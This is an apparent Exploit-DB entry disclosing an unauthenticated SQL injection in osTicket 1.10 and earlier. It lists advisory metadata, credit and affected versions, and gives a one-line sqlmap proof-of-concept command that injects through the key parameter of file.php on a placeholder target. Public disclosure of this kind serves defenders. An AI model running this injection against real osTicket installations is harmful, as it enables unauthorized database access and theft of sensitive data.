osTicket 1.10 - SQL Injection (PoC)

EDB-ID:

42660




Platform:

PHP

Date:

2017-09-12


1. ADVISORY INFORMATION
========================================
Title: osTicket v1.10 Unauthenticated SQL Injection
Application: osTicket
Bugs:  SQL Injection
Class: Sensitive Information disclosure
Remotely Exploitable: Yes
Authentication Required: NO
Versions Affected: <= v1.10
Technology: PHP
Vendor URL: http://osticket.com/
CVSSv3 Score: 10.0 (/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
Date of found: 12 Sep 2017
Author: Mehmet Ince
Advisory:
https://pentest.blog/advisory-osticket-v1-10-unauthenticated-sql-injection/

2. CREDIT
========================================
This vulnerability was identified during penetration test
by Mehmet INCE from PRODAFT / INVICTUS

3. VERSIONS AFFECTED
========================================
osTicket < 1.10

5. Technical Details & POC
========================================
Please visit an advisory URL for technical details.

PoC code:
python sqlmap.py -u "
http://target/file.php?key[id%60%3D1*%23]=1&signature=1&expires=15104725311" --dbms MySQL

6. RISK
========================================
The vulnerability allows remote attackers to execute a sql query on
database system.

7. REFERENCES
========================================
https://pentest.blog/advisory-osticket-v1-10-unauthenticated-sql-injection/